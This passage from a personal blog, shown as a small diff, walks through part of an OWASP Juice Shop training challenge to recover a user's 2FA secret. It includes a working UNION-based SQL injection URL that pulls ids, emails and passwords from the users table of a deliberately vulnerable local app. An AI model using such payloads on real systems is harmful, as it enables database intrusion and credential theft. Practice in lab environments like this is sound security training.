KarAshutosh/karashutosh.github.io/blogs/blog4.md

 1. [Access the administration section of the store](https://pwning.owasp-juice.shop/companion-guide/latest/appendix/solutions.html#_access_the_administration_section_of_the_store) while inspecting network traffic.
 2. You will learn the email address of the user in question is unsurprisingly `wurstbrot@juice-sh.op`.
-3. You will also notice that there is no information about any user’s 2FA configuration in the responses from `/api/Users`.
+3. You will also notice that there is no information about any user's 2FA configuration in the responses from `/api/Users`.
 4. Solve [Retrieve a list of all user credentials via SQL Injection](https://pwning.owasp-juice.shop/companion-guide/latest/appendix/solutions.html#_retrieve_a_list_of_all_user_credentials_via_sql_injection) and keep its final attack payload ready.
 5. Change the one of the `null`s in payload to hopefully find a column that contains the secret key for the 2FA setup:
     - [http://localhost:3000/rest/products/search?q=%27))%20union%20select%20null,id,email,password,2fa,null,null,null,null%20from%20users--](http://localhost:3000/rest/products/search?q=%27))%20union%20select%20null,id,email,password,2fa,null,null,null,null%20from%20users--) yields a `500` error with `SequelizeDatabaseError: SQLITE_ERROR: no such column: 2fa`.